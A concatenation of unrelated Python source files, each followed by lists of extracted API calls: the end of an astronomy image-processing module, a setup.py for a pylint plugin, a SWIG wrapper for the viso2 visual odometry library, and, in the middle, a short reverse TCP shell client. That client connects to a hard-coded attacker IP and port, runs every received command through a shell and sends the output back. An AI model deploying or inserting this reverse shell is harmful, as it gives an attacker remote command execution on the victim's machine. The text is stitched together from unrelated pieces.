self.images[datacube_name][filter_name] = remote_convolution_frame(self.images[datacube_name][filter_name], kernel_path, host_id)
# The convolution is performed locally
else:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Load the kernel
kernel = Frame.from_file(kernel_paths[filter_name])
# Debugging
log.debug("Convolving the '" + filter_name + "' image of the '" + datacube_name + "' instrument ...")
# Convolve this image frame
self.images[datacube_name][filter_name].convolve(kernel)
# -----------------------------------------------------------------
def convert_units(self, unit):
"""
This function ...
:param self:
:param unit:
:return:
"""
# TODO: right now, this is just an implementation of the conversion from W / (m2 * arcsec2 * micron) to MJy/sr
# 1 Jy = 1e-26 * W / (m2 * Hz)
# Inform the user
log.info("Converting the units of the images to " + str(unit) + " ...")
# Get the pixelscale
#pixelscale = self.wcs.average_pixelscale.to("arcsec/pix").value # in arcsec**2 / pixel
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Converting the unit of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Get the pivot wavelength of the filter
fltr = self.filters[filter_name]
pivot = fltr.pivotwavelength() * Unit("micron")
# Determine the conversion factor
conversion_factor = 1.0
# From surface brightness to flux density (no)
#conversion_factor *=
# From W / (m2 * arcsec2 * micron) to W / (m2 * arcsec2 * Hz)
conversion_factor *= (pivot ** 2 / speed_of_light).to("micron/Hz").value
# From W / (m2 * arcsec2 * Hz) to MJy / sr
#conversion_factor *= (Unit("W/(m2 * arcsec2 * Hz)") / Unit("MJy/sr")).to("")
conversion_factor *= 1e26 * 1e-6 * (Unit("sr") / Unit("arcsec2")).to("")
# Convert
self.images[datacube_name][filter_name] *= conversion_factor
self.images[datacube_name][filter_name].unit = "MJy/sr"
# -----------------------------------------------------------------
def write(self, output_path):
"""
This function ...
:param output_path:
:return:
"""
# Inform the user
log.info("Writing the images ...")
# Loop over the different images (self.images is a nested dictionary of dictionaries)
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Determine the path to the output FITS file
path = fs.join(output_path, datacube_name + "__" + filter_name + ".fits")
# Save the image
self.images[datacube_name][filter_name].save(path)
# -----------------------------------------------------------------
def instrument_name(datacube_path, prefix):
"""
This function ...
:param datacube_path:
:param prefix:
:return:
"""
return fs.name(datacube_path).split("_total.fits")[0].split(prefix + "_")[1]
# -----------------------------------------------------------------
| [
"astropy.units.Unit"
]
| [((12455, 12469), 'astropy.units.Unit', 'Unit', (['"""micron"""'], {}), "('micron')\n", (12459, 12469), False, 'from astropy.units import Unit\n'), ((13037, 13047), 'astropy.units.Unit', 'Unit', (['"""sr"""'], {}), "('sr')\n", (13041, 13047), False, 'from astropy.units import Unit\n'), ((13050, 13065), 'astropy.units.Unit', 'Unit', (['"""arcsec2"""'], {}), "('arcsec2')\n", (13054, 13065), False, 'from astropy.units import Unit\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md')) as fin:
long_description = fin.read()
setup(
name='pylint-pytest',
version='1.0.3',
author='<NAME>',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
license='MIT',
url='https://github.com/reverbc/pylint-pytest',
description='A Pylint plugin to suppress pytest-related false positives.',
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests', 'sandbox']),
install_requires=[
'pylint',
'pytest>=4.6',
],
python_requires='>=3.6',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Topic :: Software Development :: Quality Assurance',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
tests_require=['pytest', 'pylint'],
keywords=['pylint', 'pytest', 'plugin'],
)
| [
"os.path.dirname",
"setuptools.find_packages",
"os.path.join"
]
| [((133, 155), 'os.path.dirname', 'path.dirname', (['__file__'], {}), '(__file__)\n', (145, 155), False, 'from os import path\n'), ((167, 195), 'os.path.join', 'path.join', (['here', '"""README.md"""'], {}), "(here, 'README.md')\n", (176, 195), False, 'from os import path\n'), ((654, 697), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "['tests', 'sandbox']"}), "(exclude=['tests', 'sandbox'])\n", (667, 697), False, 'from setuptools import setup, find_packages\n')] |
# Reverse TCP Shell in Python For Offensive Security/Penetration Testing Assignments
# Connect on LinkedIn https://www.linkedin.com/in/lismore or Twitter @patricklismore
#=========================================================================================================================================
# Python TCP Client
import socket
import subprocess
#Start client function
def startClient():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create the socket object 'sock'
sock.connect(('192.168.1.95', 5000)) # Replace the IP and listening port to your attack machine
while True: # start an infinite loop
sentCommand = sock.recv(1024) # read the 1st KB of the tcp socket
if 'terminate' in sentCommand: # if we get a termiante string from the attack machine then we will close the socket, end the loop
sock.close()
break
else: # or else, the sent command gets sent to the victim shell process
CMD = subprocess.Popen(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
sock.send( CMD.stdout.read() ) # return shell result
sock.send( CMD.stderr.read() ) # return any shell errors
#Main function
def main ():
startClient()
#Program entry point
main()
| [
"subprocess.Popen",
"socket.socket"
]
| [((420, 469), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (433, 469), False, 'import socket\n'), ((1233, 1350), 'subprocess.Popen', 'subprocess.Popen', (['sentCommand'], {'shell': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'stdin': 'subprocess.PIPE'}), '(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=\n subprocess.PIPE, stdin=subprocess.PIPE)\n', (1249, 1350), False, 'import subprocess\n')] |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.12
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info >= (2, 7, 0):
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, '_viso2')).lstrip('.')
try:
return importlib.import_module(mname)
except ImportError:
return importlib.import_module('_viso2')
_viso2 = swig_import_helper()
del swig_import_helper
elif _swig_python_version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_viso2', [dirname(__file__)])
except ImportError:
import _viso2
return _viso2
try:
_mod = imp.load_module('_viso2', fp, pathname, description)
finally:
if fp is not None:
fp.close()
return _mod
_viso2 = swig_import_helper()
del swig_import_helper
else:
import _viso2
del _swig_python_version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
class SwigPyIterator(_object):
"""Proxy of C++ swig::SwigPyIterator class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_SwigPyIterator
__del__ = lambda self: None
def value(self):
"""value(self) -> PyObject *"""
return _viso2.SwigPyIterator_value(self)
def incr(self, n=1):
"""
incr(self, n=1) -> SwigPyIterator
incr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_incr(self, n)
def decr(self, n=1):
"""
decr(self, n=1) -> SwigPyIterator
decr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_decr(self, n)
def distance(self, x):
"""distance(self, x) -> ptrdiff_t"""
return _viso2.SwigPyIterator_distance(self, x)
def equal(self, x):
"""equal(self, x) -> bool"""
return _viso2.SwigPyIterator_equal(self, x)
def copy(self):
"""copy(self) -> SwigPyIterator"""
return _viso2.SwigPyIterator_copy(self)
def next(self):
"""next(self) -> PyObject *"""
return _viso2.SwigPyIterator_next(self)
def __next__(self):
"""__next__(self) -> PyObject *"""
return _viso2.SwigPyIterator___next__(self)
def previous(self):
"""previous(self) -> PyObject *"""
return _viso2.SwigPyIterator_previous(self)
def advance(self, n):
"""advance(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator_advance(self, n)
def __eq__(self, x):
"""__eq__(self, x) -> bool"""
return _viso2.SwigPyIterator___eq__(self, x)
def __ne__(self, x):
"""__ne__(self, x) -> bool"""
return _viso2.SwigPyIterator___ne__(self, x)
def __iadd__(self, n):
"""__iadd__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___iadd__(self, n)
def __isub__(self, n):
"""__isub__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___isub__(self, n)
def __add__(self, n):
"""__add__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___add__(self, n)
def __sub__(self, *args):
"""
__sub__(self, n) -> SwigPyIterator
__sub__(self, x) -> ptrdiff_t
"""
return _viso2.SwigPyIterator___sub__(self, *args)
def __iter__(self):
return self
SwigPyIterator_swigregister = _viso2.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
class VisualOdometry(_object):
"""Proxy of C++ VisualOdometry class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometry, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometry, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_VisualOdometry
__del__ = lambda self: None
def process(self, p_matched_):
"""process(self, p_matched_) -> bool"""
return _viso2.VisualOdometry_process(self, p_matched_)
def getMotion(self):
"""getMotion(self) -> Matrix"""
return _viso2.VisualOdometry_getMotion(self)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.VisualOdometry_getMatches(self)
def getNumberOfMatches(self):
"""getNumberOfMatches(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfMatches(self)
def getNumberOfInliers(self):
"""getNumberOfInliers(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfInliers(self)
def getInlierIndices(self):
"""getInlierIndices(self) -> std::vector< int32_t,std::allocator< int32_t > >"""
return _viso2.VisualOdometry_getInlierIndices(self)
def getGain(self, inliers_):
"""getGain(self, inliers_) -> float"""
return _viso2.VisualOdometry_getGain(self, inliers_)
VisualOdometry_swigregister = _viso2.VisualOdometry_swigregister
VisualOdometry_swigregister(VisualOdometry)
class calibration(_object):
"""Proxy of C++ VisualOdometry::calibration class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, calibration, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, calibration, name)
__repr__ = _swig_repr
__swig_setmethods__["f"] = _viso2.calibration_f_set
__swig_getmethods__["f"] = _viso2.calibration_f_get
if _newclass:
f = _swig_property(_viso2.calibration_f_get, _viso2.calibration_f_set)
__swig_setmethods__["cu"] = _viso2.calibration_cu_set
__swig_getmethods__["cu"] = _viso2.calibration_cu_get
if _newclass:
cu = _swig_property(_viso2.calibration_cu_get, _viso2.calibration_cu_set)
__swig_setmethods__["cv"] = _viso2.calibration_cv_set
__swig_getmethods__["cv"] = _viso2.calibration_cv_get
if _newclass:
cv = _swig_property(_viso2.calibration_cv_get, _viso2.calibration_cv_set)
def __init__(self):
"""__init__(self) -> calibration"""
this = _viso2.new_calibration()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_calibration
__del__ = lambda self: None
calibration_swigregister = _viso2.calibration_swigregister
calibration_swigregister(calibration)
class bucketing(_object):
"""Proxy of C++ VisualOdometry::bucketing class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, bucketing, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, bucketing, name)
__repr__ = _swig_repr
__swig_setmethods__["max_features"] = _viso2.bucketing_max_features_set
__swig_getmethods__["max_features"] = _viso2.bucketing_max_features_get
if _newclass:
max_features = _swig_property(_viso2.bucketing_max_features_get, _viso2.bucketing_max_features_set)
__swig_setmethods__["bucket_width"] = _viso2.bucketing_bucket_width_set
__swig_getmethods__["bucket_width"] = _viso2.bucketing_bucket_width_get
if _newclass:
bucket_width = _swig_property(_viso2.bucketing_bucket_width_get, _viso2.bucketing_bucket_width_set)
__swig_setmethods__["bucket_height"] = _viso2.bucketing_bucket_height_set
__swig_getmethods__["bucket_height"] = _viso2.bucketing_bucket_height_get
if _newclass:
bucket_height = _swig_property(_viso2.bucketing_bucket_height_get, _viso2.bucketing_bucket_height_set)
def __init__(self):
"""__init__(self) -> bucketing"""
this = _viso2.new_bucketing()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_bucketing
__del__ = lambda self: None
bucketing_swigregister = _viso2.bucketing_swigregister
bucketing_swigregister(bucketing)
class VO_parameters(_object):
"""Proxy of C++ VisualOdometry::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VO_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VO_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["match"] = _viso2.VO_parameters_match_set
__swig_getmethods__["match"] = _viso2.VO_parameters_match_get
if _newclass:
match = _swig_property(_viso2.VO_parameters_match_get, _viso2.VO_parameters_match_set)
__swig_setmethods__["bucket"] = _viso2.VO_parameters_bucket_set
__swig_getmethods__["bucket"] = _viso2.VO_parameters_bucket_get
if _newclass:
bucket = _swig_property(_viso2.VO_parameters_bucket_get, _viso2.VO_parameters_bucket_set)
__swig_setmethods__["calib"] = _viso2.VO_parameters_calib_set
__swig_getmethods__["calib"] = _viso2.VO_parameters_calib_get
if _newclass:
calib = _swig_property(_viso2.VO_parameters_calib_get, _viso2.VO_parameters_calib_set)
def __init__(self):
"""__init__(self) -> VO_parameters"""
this = _viso2.new_VO_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VO_parameters
__del__ = lambda self: None
VO_parameters_swigregister = _viso2.VO_parameters_swigregister
VO_parameters_swigregister(VO_parameters)
class VisualOdometryMono(VisualOdometry):
"""Proxy of C++ VisualOdometryMono class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryMono, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryMono, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryMono"""
this = _viso2.new_VisualOdometryMono(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryMono
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I, dims, replace=False) -> bool
process(self, I, dims) -> bool
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
"""
return _viso2.VisualOdometryMono_process(self, *args)
def getInlierMatches(self):
"""getInlierMatches(self) -> MatchVector"""
return _viso2.VisualOdometryMono_getInlierMatches(self)
def process_frame(self, *args):
"""
process_frame(self, image1, replace=False) -> bool
process_frame(self, image1) -> bool
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryMono_process_frame(self, *args)
VisualOdometryMono_swigregister = _viso2.VisualOdometryMono_swigregister
VisualOdometryMono_swigregister(VisualOdometryMono)
class Mono_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryMono::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Mono_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Mono_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["height"] = _viso2.Mono_parameters_height_set
__swig_getmethods__["height"] = _viso2.Mono_parameters_height_get
if _newclass:
height = _swig_property(_viso2.Mono_parameters_height_get, _viso2.Mono_parameters_height_set)
__swig_setmethods__["pitch"] = _viso2.Mono_parameters_pitch_set
__swig_getmethods__["pitch"] = _viso2.Mono_parameters_pitch_get
if _newclass:
pitch = _swig_property(_viso2.Mono_parameters_pitch_get, _viso2.Mono_parameters_pitch_set)
__swig_setmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Mono_parameters_ransac_iters_get, _viso2.Mono_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Mono_parameters_inlier_threshold_get, _viso2.Mono_parameters_inlier_threshold_set)
__swig_setmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_set
__swig_getmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_get
if _newclass:
motion_threshold = _swig_property(_viso2.Mono_parameters_motion_threshold_get, _viso2.Mono_parameters_motion_threshold_set)
def __init__(self):
"""__init__(self) -> Mono_parameters"""
this = _viso2.new_Mono_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Mono_parameters
__del__ = lambda self: None
Mono_parameters_swigregister = _viso2.Mono_parameters_swigregister
Mono_parameters_swigregister(Mono_parameters)
class VisualOdometryStereo(VisualOdometry):
"""Proxy of C++ VisualOdometryStereo class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryStereo, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryStereo, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryStereo"""
this = _viso2.new_VisualOdometryStereo(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryStereo
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
process(self, p_matched_) -> bool
"""
return _viso2.VisualOdometryStereo_process(self, *args)
def process_frame(self, image1, image2, replace=False):
"""
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryStereo_process_frame(self, image1, image2, replace)
VisualOdometryStereo_swigregister = _viso2.VisualOdometryStereo_swigregister
VisualOdometryStereo_swigregister(VisualOdometryStereo)
class Stereo_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryStereo::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Stereo_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Stereo_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["base"] = _viso2.Stereo_parameters_base_set
__swig_getmethods__["base"] = _viso2.Stereo_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Stereo_parameters_base_get, _viso2.Stereo_parameters_base_set)
__swig_setmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Stereo_parameters_ransac_iters_get, _viso2.Stereo_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Stereo_parameters_inlier_threshold_get, _viso2.Stereo_parameters_inlier_threshold_set)
__swig_setmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_set
__swig_getmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_get
if _newclass:
reweighting = _swig_property(_viso2.Stereo_parameters_reweighting_get, _viso2.Stereo_parameters_reweighting_set)
def __init__(self):
"""__init__(self) -> Stereo_parameters"""
this = _viso2.new_Stereo_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Stereo_parameters
__del__ = lambda self: None
Stereo_parameters_swigregister = _viso2.Stereo_parameters_swigregister
Stereo_parameters_swigregister(Stereo_parameters)
class Matrix(_object):
"""Proxy of C++ Matrix class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matrix, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matrix, name)
__repr__ = _swig_repr
def __init__(self, *args):
"""
__init__(self) -> Matrix
__init__(self, m, n) -> Matrix
__init__(self, m, n, val_) -> Matrix
__init__(self, M) -> Matrix
"""
this = _viso2.new_Matrix(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matrix
__del__ = lambda self: None
def assign(self, M):
"""assign(self, M) -> Matrix"""
return _viso2.Matrix_assign(self, M)
def getData(self, val_, i1=0, j1=0, i2=-1, j2=-1):
"""
getData(self, val_, i1=0, j1=0, i2=-1, j2=-1)
getData(self, val_, i1=0, j1=0, i2=-1)
getData(self, val_, i1=0, j1=0)
getData(self, val_, i1=0)
getData(self, val_)
"""
return _viso2.Matrix_getData(self, val_, i1, j1, i2, j2)
def getMat(self, i1, j1, i2=-1, j2=-1):
"""
getMat(self, i1, j1, i2=-1, j2=-1) -> Matrix
getMat(self, i1, j1, i2=-1) -> Matrix
getMat(self, i1, j1) -> Matrix
"""
return _viso2.Matrix_getMat(self, i1, j1, i2, j2)
def setMat(self, M, i, j):
"""setMat(self, M, i, j)"""
return _viso2.Matrix_setMat(self, M, i, j)
def setVal(self, s, i1=0, j1=0, i2=-1, j2=-1):
"""
setVal(self, s, i1=0, j1=0, i2=-1, j2=-1)
setVal(self, s, i1=0, j1=0, i2=-1)
setVal(self, s, i1=0, j1=0)
setVal(self, s, i1=0)
setVal(self, s)
"""
return _viso2.Matrix_setVal(self, s, i1, j1, i2, j2)
def setDiag(self, s, i1=0, i2=-1):
"""
setDiag(self, s, i1=0, i2=-1)
setDiag(self, s, i1=0)
setDiag(self, s)
"""
return _viso2.Matrix_setDiag(self, s, i1, i2)
def zero(self):
"""zero(self)"""
return _viso2.Matrix_zero(self)
def extractCols(self, idx):
"""extractCols(self, idx) -> Matrix"""
return _viso2.Matrix_extractCols(self, idx)
def eye(m):
"""eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
eye = staticmethod(eye)
def identity(self):
"""identity(self)"""
return _viso2.Matrix_identity(self)
def diag(M):
"""diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
diag = staticmethod(diag)
def reshape(M, m, n):
"""reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
reshape = staticmethod(reshape)
def rotMatX(angle):
"""rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
rotMatX = staticmethod(rotMatX)
def rotMatY(angle):
"""rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
rotMatY = staticmethod(rotMatY)
def rotMatZ(angle):
"""rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
rotMatZ = staticmethod(rotMatZ)
def __add__(self, M):
"""__add__(self, M) -> Matrix"""
return _viso2.Matrix___add__(self, M)
def __sub__(self, M):
"""__sub__(self, M) -> Matrix"""
return _viso2.Matrix___sub__(self, M)
def __mul__(self, *args):
"""
__mul__(self, M) -> Matrix
__mul__(self, s) -> Matrix
"""
return _viso2.Matrix___mul__(self, *args)
def __truediv__(self, *args):
return _viso2.Matrix___truediv__(self, *args)
__div__ = __truediv__
def __neg__(self):
"""__neg__(self) -> Matrix"""
return _viso2.Matrix___neg__(self)
def __invert__(self):
"""__invert__(self) -> Matrix"""
return _viso2.Matrix___invert__(self)
def l2norm(self):
"""l2norm(self) -> FLOAT"""
return _viso2.Matrix_l2norm(self)
def mean(self):
"""mean(self) -> FLOAT"""
return _viso2.Matrix_mean(self)
def cross(a, b):
"""cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
cross = staticmethod(cross)
def inv(M):
"""inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
inv = staticmethod(inv)
def setInverse(self):
"""setInverse(self) -> bool"""
return _viso2.Matrix_setInverse(self)
def det(self):
"""det(self) -> FLOAT"""
return _viso2.Matrix_det(self)
def solve(self, M, eps=1e-20):
"""
solve(self, M, eps=1e-20) -> bool
solve(self, M) -> bool
"""
return _viso2.Matrix_solve(self, M, eps)
def lu(self, idx, d, eps=1e-20):
"""
lu(self, idx, d, eps=1e-20) -> bool
lu(self, idx, d) -> bool
"""
return _viso2.Matrix_lu(self, idx, d, eps)
def svd(self, U, W, V):
"""svd(self, U, W, V)"""
return _viso2.Matrix_svd(self, U, W, V)
__swig_setmethods__["val"] = _viso2.Matrix_val_set
__swig_getmethods__["val"] = _viso2.Matrix_val_get
if _newclass:
val = _swig_property(_viso2.Matrix_val_get, _viso2.Matrix_val_set)
__swig_setmethods__["m"] = _viso2.Matrix_m_set
__swig_getmethods__["m"] = _viso2.Matrix_m_get
if _newclass:
m = _swig_property(_viso2.Matrix_m_get, _viso2.Matrix_m_set)
__swig_setmethods__["n"] = _viso2.Matrix_n_set
__swig_getmethods__["n"] = _viso2.Matrix_n_get
if _newclass:
n = _swig_property(_viso2.Matrix_n_get, _viso2.Matrix_n_set)
def __str__(self):
"""__str__(self) -> std::string"""
return _viso2.Matrix___str__(self)
def toNumpy(self, mat):
"""toNumpy(self, mat)"""
return _viso2.Matrix_toNumpy(self, mat)
Matrix_swigregister = _viso2.Matrix_swigregister
Matrix_swigregister(Matrix)
def Matrix_eye(m):
"""Matrix_eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
def Matrix_diag(M):
"""Matrix_diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
def Matrix_reshape(M, m, n):
"""Matrix_reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
def Matrix_rotMatX(angle):
"""Matrix_rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
def Matrix_rotMatY(angle):
"""Matrix_rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
def Matrix_rotMatZ(angle):
"""Matrix_rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
def Matrix_cross(a, b):
"""Matrix_cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
def Matrix_inv(M):
"""Matrix_inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
class Matcher(_object):
"""Proxy of C++ Matcher class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> Matcher"""
this = _viso2.new_Matcher(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher
__del__ = lambda self: None
def setIntrinsics(self, f, cu, cv, base):
"""setIntrinsics(self, f, cu, cv, base)"""
return _viso2.Matcher_setIntrinsics(self, f, cu, cv, base)
def matchFeatures(self, method, Tr_delta=None):
"""
matchFeatures(self, method, Tr_delta=None)
matchFeatures(self, method)
